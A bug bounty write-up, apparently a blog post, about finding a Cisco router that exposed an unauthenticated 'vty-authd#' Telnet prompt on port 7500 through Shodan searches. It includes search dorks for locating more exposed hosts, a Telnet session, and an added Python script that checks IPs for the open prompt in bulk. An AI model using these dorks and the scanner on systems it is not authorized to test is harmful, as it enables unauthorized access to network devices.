How can I obtain a $2k bounty solely based on curiosity?

nanwn
3 min read · Oct 13, 2023


This is a good day for a write-up: how I earned a $2k bounty just by being curious about the banner that Shodan, hunter.how or Censys display for an IP and its ports.

When searching on Shodan, hunter.how and similar services, I always do my research on a regular basis. Perhaps that is the advantage of a cyber security assessment mindset: researchers have to be responsive to any change that appears while hunting on a specific program.

My finding was quite simple, but what I obtained was significant. Here is the story:

On Shodan:

  • org:"redacted inc" or ssl:redacted.com

I went through the IP addresses in the results on screen and examined the banner of each one. That is how I found a banner reading "vty-authd#" on an interesting port, 7500.

Since the host was a Cisco router, I tried connecting with Telnet.

NAN:~/ $ telnet <redactedip> 7500
Trying redactedip...
Connected to redactedip.
Escape character is '^]'.
vty-authd# show ?
show
<carriage return> Completes command
<number> verbosity

vty-authd# show

vty-authd#
vty-authd# ?

send send message
set set authd debug settings
show show information about AUTHD

The result showed that I had successfully connected to the router without any authentication.

I wrote the report and received a triage response from the Redacted staff, who assessed and triaged it.

And on the same day, I received the bounty.

I searched for a CVE (Common Vulnerabilities and Exposures) entry associated with this finding. I insist that it has a critical impact severity, but the program staff pointed out that it was a case of Missing Authentication for Critical Function (CWE-306) and considered the impact minimal, since it only provided limited access to the router's user rules. So Availability was set to "low", and I'm OK with it.

Redacted closed the report and changed its status to Resolved:
Thanks @nanwn for double checking. We have closed down the port and it should not let anyone connect anymore. Marking it as resolved.

Here are the dorks:

Shodan dork: "vty-authd#"

hunter.how dork: protocol.banner="vty-authd#"
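The manual Telnet session above, scripted so that every IP a dork returns can be checked the same way. This is an added example and not the author's tooling: check_vty_authd() connects to host:port, reads what the service says first and, only if that is already the "vty-authd#" prompt rather than a Username:/Password: challenge, sends "?" and parses the command list, exactly the read-only step taken in the session. The mock service (_MockVtyAuthd, start_mock_service) is a constructed local stand-in so the script runs offline; the "require_password" variant models a device that challenges first. Against real targets you would call check_vty_authd(ip, 7500) for hosts that are in scope.

```python
"""Bulk verifier for the unauthenticated "vty-authd#" prompt (added example)."""
import socket
import socketserver
import threading

PROMPT = b"vty-authd#"
AUTH_CHALLENGES = (b"Username:", b"Password:", b"login:")
TIMEOUT = 3.0


def _read_until_prompt(sock, timeout=TIMEOUT):
    """Read until the vty prompt or an auth challenge shows up, or the peer
    closes or goes quiet. Returns the raw bytes received."""
    sock.settimeout(timeout)
    buf = b""
    while True:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
        if buf.rstrip().endswith(PROMPT) or any(c in buf for c in AUTH_CHALLENGES):
            break
    return buf


def check_vty_authd(host, port=7500, timeout=TIMEOUT):
    """Describe whether host:port drops straight into the vty-authd# prompt."""
    result = {"host": host, "port": port, "banner": "", "commands": [],
              "unauthenticated": False}
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _read_until_prompt(s, timeout)
        result["banner"] = banner.decode(errors="replace").strip()
        if any(c in banner for c in AUTH_CHALLENGES) or PROMPT not in banner:
            return result  # challenged for credentials, or not this service
        # Same read-only step as the manual session: ask the prompt for help.
        s.sendall(b"?\r\n")
        help_text = _read_until_prompt(s, timeout)
    for line in help_text.decode(errors="replace").splitlines():
        line = line.strip()
        if not line or line.startswith("vty-authd#") or line == "?":
            continue
        result["commands"].append(line.split()[0])  # "send  send message" -> "send"
    result["unauthenticated"] = True
    return result


class _MockVtyAuthd(socketserver.StreamRequestHandler):
    """Constructed stand-in for the service; no real device is involved."""
    help_text = (b"\r\nsend   send message\r\n"
                 b"set    set authd debug settings\r\n"
                 b"show   show information about AUTHD\r\n")

    def handle(self):
        if self.server.require_password:  # hypothetical hardened variant
            self.wfile.write(b"Password: ")
            if self.rfile.readline():
                self.wfile.write(b"% Access denied\r\n")
            return
        self.wfile.write(PROMPT + b" ")  # straight to the prompt, no login
        while True:
            line = self.rfile.readline()
            if not line:
                return
            if line.strip() == b"?":
                self.wfile.write(self.help_text)
            self.wfile.write(PROMPT + b" ")


def start_mock_service(require_password=False):
    """Run the stand-in on 127.0.0.1 on an ephemeral port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _MockVtyAuthd)
    srv.daemon_threads = True
    srv.require_password = require_password
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    for hardened in (False, True):
        srv, port = start_mock_service(require_password=hardened)
        print(check_vty_authd("127.0.0.1", port))
        srv.shutdown()
        srv.server_close()
```

The check stops at the first credential challenge and only ever sends "?", so it confirms the CWE-306 condition (the prompt is reachable before any authentication) without touching the "set" commands that the help text lists.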

NB: Please credit my name if you repost this on social media or if you find a target in a program with it. There are numerous IP addresses you can explore and report.

Quick update: some friends asked why I immediately chose Telnet as the first experiment. The truth is that the banner and product were a Cisco telnetd on a router; only the port felt different to me.

Thank you.

Happy Hunting

Nan Winata

https://hackerone.com/nanwn
